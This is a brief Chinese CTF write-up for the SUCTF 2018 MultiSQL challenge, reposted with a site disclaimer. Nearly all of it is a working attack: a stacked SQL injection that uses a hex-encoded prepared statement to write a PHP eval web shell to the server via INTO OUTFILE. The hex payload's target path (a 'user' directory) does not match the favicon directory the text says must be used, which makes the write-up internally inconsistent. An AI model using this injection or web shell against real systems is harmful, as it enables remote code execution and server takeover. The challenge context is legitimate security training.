标签：SUCTF shell MultiSQL favicon 2018 根目录

[SUCTF 2018]MultiSQL

0x01前言

• 堆叠注入写shell

0x02预编译写shell

需要执行的语句select '<?php @eval($_POST[abc]);?>' into outfile '/var/www/html/favicon/abc.php'

为什么选favicon呢？写题目的时候我也不知道，后来上了shell我才知道，其他目录是没有写权限的

payload=set @a=0x73656C65637420273C3F70687020406576616C28245F504F53545B6162635D293B3F3E2720696E746F206F757466696C6520272F7661722F7777772F68746D6C2F757365722F6162632E70687027;prepare b from @a;execute b;

bp执行记得进行url编码。

flag在根目录

标签：SUCTF,shell,MultiSQL,favicon,2018,根目录
来源： https://www.cnblogs.com/da-wn/p/15416687.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。